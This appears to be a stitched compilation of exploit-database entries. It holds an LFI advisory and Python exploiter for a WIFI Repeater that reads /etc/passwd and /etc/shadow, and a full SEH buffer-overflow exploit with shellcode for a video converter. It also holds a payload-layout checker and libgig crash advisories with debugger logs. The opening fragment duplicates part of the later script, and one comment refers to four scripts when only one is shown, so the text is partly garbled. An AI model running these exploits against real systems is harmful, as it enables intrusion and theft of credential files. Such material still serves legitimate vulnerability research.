buf += b"\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += b"\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += b"\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += b"\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += b"\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += b"\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += b"\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += b"\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += b"\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += b"\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += b"\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += b"\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += b"\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += b"\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += b"\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += b"\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = b"\x90" * 16
data = buffer + nSEH + SEH + nops + buf
# Written as raw bytes so the shellcode is not re-encoded on the way to disk.
with open("pyramid.txt", "wb") as f:
    f.write(data)
# Exploit Title: WIFI Repeater BE126 – Local File Inclusion
# Date Publish: 23/08/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi
# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04
# CVE: CVE-2017-8770
1 - Description:
The 'getpage' HTTP parameter is passed to a file include without escaping or validation.
Because the CGI runs as root, this allows reading arbitrary local files, such as /etc/passwd,
/etc/shadow and so on.
2 - Proof of Concept:
http://Target/cgi-bin/webproc?getpage=[LFI]
/etc/passwd:
http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
/etc/shadow:
http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
#!/usr/bin/env python3
'''
LFI PoC By Hay and Omer
'''
import sys
import urllib.request

print("[+] cgi-bin/webproc exploiter [+]")
if len(sys.argv) != 2:
    print("[+] usage: python3 " + __file__ + " <target_ip>")
    sys.exit(1)
ip_add = sys.argv[1]
# Leading slashes are stripped because the request below already supplies one.
fd = input('[+] File or Directory: aka /etc/passwd and etc..\n').lstrip('/')
print("Exploiting.....\n")
# getpage is included unvalidated; the remaining parameters are the ones from
# the manual requests above.
URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard"
print(urllib.request.urlopen(URL, timeout=10).read().decode('utf-8', errors='replace'))
#!/usr/bin/env python3
###############################################################################
# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy Video to iPod/MP4/PSP/3GP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.20
# Software Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
# 1008 bytes of filler reach the SEH record (nSEH, then the handler pointer).
buffer = b"\x41" * 1008
# nSEH: short jump (EB 10) over the handler address into the NOP sled below.
nSEH = b"\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = b"\x59\x78\x03\x10"
badchars = b"\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = b""
buf += b"\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += b"\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += b"\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += b"\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += b"\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += b"\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += b"\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += b"\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += b"\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += b"\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += b"\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += b"\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += b"\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += b"\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += b"\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += b"\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = b"\x90" * 16
data = buffer + nSEH + SEH + nops + buf
# Written as raw bytes so the shellcode is not re-encoded on the way to disk.
with open("pyramid.txt", "wb") as f:
    f.write(data)
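The four divxtodvd.net scripts above all write the same record: 1008 bytes of filler, a four-byte nSEH holding a short jump, the SkinMagic.dll pop/pop/ret address, a 16-byte NOP sled and the shellcode. As an added example, not the author's code, this Python 3 helper rebuilds that layout from the same constants and performs the checks worth running before pasting the file: that nSEH sits exactly at offset 1008, that the handler pointer packs to 0x10037859 little-endian, where the jmp short in nSEH actually lands relative to the sled, and that no 0x00, 0x0a or 0x0d byte appears anywhere in the record. The shellcode is a constructed int3 placeholder; drop in the msfvenom output to check a real payload.

```python
import struct

OFFSET_TO_NSEH = 1008            # filler length that reaches the SEH record
POP_POP_RET = 0x10037859         # pop esi # pop ebx # ret 0x04 in SkinMagic.dll (no SafeSEH/ASLR)
NSEH = b"\xeb\x10\x90\x90"       # jmp short +0x10, then two NOPs of padding
NOPS = b"\x90" * 16
BADCHARS = b"\x00\x0a\x0d"       # bytes the 'Enter User Name' field cannot carry

# Constructed placeholder instead of the msfvenom windows/exec payload.
PLACEHOLDER_SHELLCODE = b"\xcc" * 32


def build_record(shellcode: bytes) -> bytes:
    """Same layout as the scripts: filler | nSEH | SEH | NOP sled | shellcode."""
    return b"\x41" * OFFSET_TO_NSEH + NSEH + struct.pack("<I", POP_POP_RET) + NOPS + shellcode


def seh_layout(record: bytes) -> dict:
    """Decode what the overwritten SEH record will do once the exception fires."""
    nseh_at = OFFSET_TO_NSEH
    seh_at = nseh_at + 4
    opcode, rel8 = record[nseh_at], record[nseh_at + 1]
    # EB rel8 is relative to the next instruction (nseh_at + 2); rel8 is signed,
    # so a backwards jump (rel8 >= 0x80) is handled as well.
    rel8 = rel8 - 256 if rel8 > 127 else rel8
    jump_target = nseh_at + 2 + rel8
    handler = struct.unpack_from("<I", record, seh_at)[0]
    sled_start, sled_end = seh_at + 4, seh_at + 4 + len(NOPS)
    return {
        "nseh_at": nseh_at,
        "seh_at": seh_at,
        "is_short_jmp": opcode == 0xEB,
        "jump_target": jump_target,
        "lands_in_sled": sled_start <= jump_target < sled_end,
        "handler": handler,
    }


def find_badchars(record: bytes, bad: bytes = BADCHARS) -> list:
    """(offset, byte) pairs for every byte the input field would mangle or truncate."""
    return [(i, b) for i, b in enumerate(record) if b in bad]


if __name__ == "__main__":
    rec = build_record(PLACEHOLDER_SHELLCODE)
    print(seh_layout(rec))
    print("bad bytes:", find_badchars(rec))
```

With the page's constants the jump lands at offset 1026, ten bytes into the sled, which is why the record still works even though the handler address itself is skipped over rather than executed as code.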
================
Author : qflb.wu
===============
Introduction:
=============
https://www.linuxsampler.org/libgig/
libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data.
Affected version:
=====
4.0.0
Vulnerability Description:
==========================
1.
The gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service (NULL pointer dereference and application crash) via a crafted gig file: pDimensionRegions[i] is NULL when the wave pool lookup result is stored through it (r14 is 0 at the faulting mov below, hence the ASAN write to address 0x38).
./gigdump libgig_4.0.0_null_pointer_dereference_1.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
2970 if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
(gdb) bt
#0 0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
#1 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
at gig.cpp:4404
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
   0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>: je     0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
   0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>: xor    %edx,%edx
   0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>: mov    %eax,%esi
   0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>: mov    %rbx,%rdi
   0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>: mov    0x138(%r13),%r14
   0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>: callq  0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
=> 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>: mov    %rax,0x38(%r14)
   0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>: add    $0x1,%ebp
   0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>: add    $0x8,%r13
   0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>: cmp    %ebp,0x130(%rbx)
End of assembler dump.
(gdb) i r
rax            0x60ca90            6343312
rbx            0x614ce0            6376672
rcx            0x33                51
rdx            0x60a300            6333184
rsi            0x0                 0
rdi            0x609160            6328672
rbp            0x0                 0x0
rsp            0x7fffffffdcc0      0x7fffffffdcc0
r8             0x0                 0
r9             0x2                 2
r10            0x0                 0
r11            0x246               582
r12            0x615950            6379856
r13            0x614ce0            6376672
r14            0x0                 0
r15            0x0                 0
rip            0x7ffff7bc07df      0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
eflags         0x10246             [ PF ZF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb)
ASAN:SIGSEGV
=================================================================
==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
==40516== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_1.gig
CVE:
CVE-2017-12950
2.
The gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service (stack buffer overflow and application crash) via a crafted gig file; the fault is on the first write to the on-stack table (table[0] = 0 at gig.cpp:2884).
./gigdump libgig_4.0.0_stack_buffer_overflow.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
2884 table[0] = 0;
(gdb) bt
#0 0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
#1 0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2054
#2 0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>,
vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>,
vcfCutoffController=<optimized out>) at gig.cpp:2042
#3 0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
at gig.cpp:1617
#4 0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
#5 0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0,
pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
#6 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280,
pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#7 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#8 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#9 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
...
   0x00007ffff7bb8b27 <+2119>:  mov    0x2e0(%rsp,%rdx,8),%rsi
   0x00007ffff7bb8b2f <+2127>:  je     0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
   0x00007ffff7bb8b35 <+2133>:  movzbl %bpl,%ebx
   0x00007ffff7bb8b39 <+2137>:  cvtsi2sd %ebx,%xmm6
   0x00007ffff7bb8b3d <+2141>:  movq   $0x0,(%rax)
=> 0x00007ffff7bb8b44 <+2148>:  mov    0x8(%rsi),%edi
   0x00007ffff7bb8b47 <+2151>:  lea    0x8(%rax),%rcx
   0x00007ffff7bb8b4b <+2155>:  mov    0xc(%rsi),%r10d
   0x00007ffff7bb8b4f <+2159>:  mov    $0x1,%edx
...
(gdb) i r
rax            0x60e050 6348880
rbx            0x14     20
rcx            0x7ffff7669760   140737344083808
rdx            0xfe     254
rsi            0x2f736c6f6f742f63       3419195767971393379
rdi            0x2      2
rbp            0x0      0x0
rsp            0x7fffffffd860   0x7fffffffd860
r8             0x60dbc0 6347712
r9             0x40     64
r10            0x7fffffffd9f0   140737488345584
r11            0x7ffff7bbf601   140737349678593
r12            0x4      4
r13            0x60d770 6346608
r14            0x60c3a0 6341536
r15            0x60c3a0 6341536
rip            0x7ffff7bb8b44   0x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
eflags         0x10246  [ PF ZF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x/20x $rsi+0x8
0x2f736c6f6f742f6b:     Cannot access memory at address 0x2f736c6f6f742f6b
(gdb)
0x2f736c6f6f742f6f:     Cannot access memory at address 0x2f736c6f6f742f6f
==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
READ of size 8 at 0x7ffc9ca05fa0 thread T0
#0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
#1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
#2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
#3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
#4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
#5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
This frame has 2 object(s):
[32, 40) 'name'
[96, 104) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
Shadow bytes around the buggy address:
0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
=>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==40504== ABORTING
POC:
libgig_4.0.0_stack_buffer_overflow.gig
CVE:
CVE-2017-12951
3.
The LoadString function in helper.h in libgig 4.0.0 can cause a denial of service (NULL pointer dereference and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_null_pointer_dereference_2.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
LoadString (s="", ck=0x6095d0) at helper.h:148
148 if (str[len] == '\0') break;
(gdb) bt
#0 LoadString (s="", ck=0x6095d0) at helper.h:148
#1 DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865,
lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
#2 0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
at DLS.cpp:263
#3 0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160,
Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
at DLS.cpp:448
#4 0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
at DLS.cpp:1435
#5 0x00007ffff7bbab2e in gig::File::File (this=0x609160,
pRIFF=<optimized out>) at gig.cpp:5201
#6 0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:70
(gdb) disassemble
Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
   0x00007ffff7ba7f30 <+0>:     push   %rbp
   0x00007ffff7ba7f31 <+1>:     mov    %edi,%eax
   0x00007ffff7ba7f33 <+3>:     mov    %rsi,%rdi
   0x00007ffff7ba7f36 <+6>:     mov    %eax,%esi
   0x00007ffff7ba7f38 <+8>:     push   %rbx
   0x00007ffff7ba7f39 <+9>:     mov    %rdx,%rbx
   0x00007ffff7ba7f3c <+12>:    sub    $0x8,%rsp
   0x00007ffff7ba7f40 <+16>:    callq  0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
   0x00007ffff7ba7f45 <+21>:    test   %rax,%rax
   0x00007ffff7ba7f48 <+24>:    mov    %rax,%rbp
   0x00007ffff7ba7f4b <+27>:    je     0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
   0x00007ffff7ba7f4d <+29>:    mov    %rax,%rdi
   0x00007ffff7ba7f50 <+32>:    callq  0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
   0x00007ffff7ba7f55 <+37>:    mov    0xc(%rbp),%r10d
   0x00007ffff7ba7f59 <+41>:    mov    %rax,%rsi
   0x00007ffff7ba7f5c <+44>:    test   %r10d,%r10d
   0x00007ffff7ba7f5f <+47>:    jle    0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
=> 0x00007ffff7ba7f61 <+49>:    cmpb   $0x0,(%rax)
   0x00007ffff7ba7f64 <+52>:    je     0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
   0x00007ffff7ba7f66 <+54>:    mov    $0x1,%r9d
   0x00007ffff7ba7f6c <+60>:    xor    %ecx,%ecx
   0x00007ffff7ba7f6e <+62>:    jmp    0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
   0x00007ffff7ba7f70 <+64>:    cmpb   $0x0,(%rsi,%r9,1)
   0x00007ffff7ba7f75 <+69>:    lea    0x1(%r9),%r8
   0x00007ffff7ba7f79 <+73>:    je     0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
   0x00007ffff7ba7f7b <+75>:    mov    %r8,%r9
   0x00007ffff7ba7f7e <+78>:    add    $0x1,%ecx
   0x00007ffff7ba7f81 <+81>:    cmp    %r10d,%ecx
   0x00007ffff7ba7f84 <+84>:    jne    0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
   0x00007ffff7ba7f86 <+86>:    movslq %ecx,%rdx
   0x00007ffff7ba7f89 <+89>:    mov    %rbx,%rdi
   0x00007ffff7ba7f8c <+92>:    callq  0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
   0x00007ffff7ba7f91 <+97>:    add    $0x8,%rsp
   0x00007ffff7ba7f95 <+101>:   mov    %rbp,%rdi
   0x00007ffff7ba7f98 <+104>:   pop    %rbx
   0x00007ffff7ba7f99 <+105>:   pop    %rbp
(gdb) i r
rax            0x0      0
rbx            0x609238 6328888
rcx            0x7ffff739f9f7   140737341159927
rdx            0x7ffff5d9f000   140737318088704
rsi            0x0      0
rdi            0x7ffff5d9f000   140737318088704
rbp            0x6095d0 0x6095d0
rsp            0x7fffffffdd80   0x7fffffffdd80
r8             0xffffffff       4294967295
r9             0x0      0
r10            0x100001a        16777242
r11            0x247    583
r12            0x609220 6328864
r13            0x7fffffffdfa0   140737488347040
r14            0x0      0
r15            0x6091a0 6328736
rip            0x7ffff7ba7f61   0x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
ASAN:SIGSEGV
=================================================================
==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
#1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
#2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
#3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
#4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
#5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
#6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
#7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
==41244== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_2.gig
CVE:
CVE-2017-12952
4.
The gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service (invalid memory write and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_write.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
